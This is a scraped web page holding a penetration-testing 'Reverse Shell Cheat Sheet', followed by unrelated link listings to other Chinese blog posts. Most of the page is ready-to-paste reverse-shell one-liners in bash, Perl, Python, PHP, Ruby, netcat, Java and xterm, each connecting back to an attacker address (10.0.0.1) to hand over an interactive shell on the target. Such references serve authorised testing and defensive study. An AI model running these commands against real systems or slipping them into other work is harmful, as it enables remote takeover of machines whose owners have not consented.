Reverse Shell Cheat Sheet If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former. Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared. The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”. Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.
Bash Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 PERL Here’s a shorter, feature-free version of the perl-reverse-shell: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' There’s also an alternative PERL revere shell here.
Python This was tested under Linux / Python 2.7: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PHP This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6… php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' If you want a .php file to upload, see the more featureful and robust php-reverse-shell.
Ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option. nc -e /bin/sh 10.0.0.1 1234 If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f Java r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor() [Untested submission from anonymous reader]
xterm One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001. xterm -display 10.0.0.1:1 To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system): Xnest :1 You’ll need to authorise the target to connect to you (command also run on your host): xhost +targetip Further Reading Also check out Bernardo’s Reverse Shell One-Liners. He has some alternative approaches and doesn’t rely on /bin/sh for his Ruby reverse shell. There’s a reverse shell written in gawk over here. Gawk is not something that I’ve ever used myself. However, it seems to get installed by default quite often, so is exactly the sort of language pentesters might want to use for reverse shells. Tags: bash, cheatsheet, netcat, pentest, perl, php, python, reverseshell, ruby, xterm Posted in Shells

Reverse Shell Cheat Sheet的更多相关文章

  1. Linux常用命令汇总 - Linux Shell Cheat Sheet

    1. 查看Linux操作系统信息: uname -a cat /proc/version lsb_release -a 2. 设置ls显示的文件夹的颜色(将下面这条目录加在 .bashrc 文件最后) ...

  2. IOS Application Security Testing Cheat Sheet

    IOS Application Security Testing Cheat Sheet    [hide]  1 DRAFT CHEAT SHEET - WORK IN PROGRESS 2 Int ...

  3. XSS Filter Evasion Cheat Sheet 中文版

    前言 译者注: 翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常有价值.但是这么著名的一个备忘录却一直没有人把它翻译成中文版.很多人仅仅是简单的把文中的 各种代码复制下来,然后看起来很刁的发在 ...

  4. [转]Blue Prism VBO Cheat Sheet

    本文转自:https://www.cheatography.com/ethanium/cheat-sheets/blue-prism-vbo/ Blue Prism MAPIEx Configure ...

  5. Tools - 速查表与备忘单(Cheat Sheet)

    Cheat Sheets Rico's cheatsheets Cheat-Sheets.org Python Python Cheat sheet Python Programming Cheat ...

  6. Racket Cheat Sheet

    Racket Cheat Sheet 来源  http://docs.racket-lang.org/racket-cheat/index.html?q=Racket%20Cheat%20Sheet ...

  7. cheat sheet (小抄的意思-考试的时候,带在路上原先抄的重要的知识点)

    Cheat Sheet,这里面有个Cheat(欺骗),想当然的话,意思肯定不好.事实上,这Cheat Sheet 的原意的确也就是“小抄”的意思.所以,字典的定义是:“A piece of paper ...

  8. 转:PostgreSQL Cheat Sheet

    PostgreSQL Cheat Sheet CREATE DATABASE CREATE DATABASE dbName; CREATE TABLE (with auto numbering int ...

  9. Git Cheat Sheet

    Merge Undo git merge with conflicts $ git merge --abort Archive $ git archive --format zip --output ...

随机推荐

  1. 《PHP面试笔试真题库》——PHP面试的好帮手

    你好,是我琉忆. 一个文艺的PHP开发工程师. 很荣幸能够在这里带来我的第一本新书--<PHP程序员面试笔试真题库>. 一.创作过程 <PHP 程序员面试笔试真题库>是我的第三 ...

  2. MXNet学习-第一个例子:训练MNIST数据集

    一个门外汉写的MXNET跑MNIST的例子,三层全连接层最后验证率是97%左右,毕竟是第一个例子,主要就是用来理解MXNet怎么使用. #导入需要的模块 import numpy as np #num ...

  3. Solution -「51nod 1355」斐波那契的最小公倍数

    \(\mathcal{Description}\)   Link.   令 \(f\) 为 \(\text{Fibonacci}\) 数列,给定 \(\{a_n\}\),求: \[\operatorn ...

  4. suse 12安装 python-pip

    文章目录 方法一 安装setup-tools 安装pip 方法二 配置阿里云pip源 pip安装pyotp 方法一 安装setup-tools linux-oz6w:~ # wget https:// ...

  5. Spring中publish如何将多个Event和多个Listener进行无误差匹配

    从命令模式的维度理解Spring 之Application Event - 池塘里洗澡的鸭子 - 博客园 (cnblogs.com)中通自定义简单的Event和Listener阐述了Spring中pu ...

  6. Spring Boot内置Tomcat

    Spring Boot默认支持Tomcat/Jetty/Undertow作为底层容器.在之前实战相关的文章中,可以看到引入spring-boot-starter-web就默认使用tomcat容器,这是 ...

  7. 部署Nginx网站服务

    编译安装Nginx nginx 官方 : http://nginx.org/ yum -y install pcre-devel zlib-devel   ##安装相关依赖包 ./configure ...

  8. C# 使用技巧区

    1.事件中的技巧 (1)在事件发送者中,用delegate{}初始化事件.这样就不用每次在使用事件的时候判读事件是否为空了. delegate { }可以赋值给任何类型的委托.这个功能匿名方法特有的, ...

  9. Java -- List与数组转换

    list转数组 使用for循环 使用list.toArray(new String[]),不可以强制转换list.toArray(),因为数组在jvm是一个object表示的,是一个对象 数组转lis ...

  10. WPS:为什么无法页眉页脚同前节(同前节是灰的)

    问题:,同前节是灰的 原因:全文只有一节,插入分节符就可以设置同前节了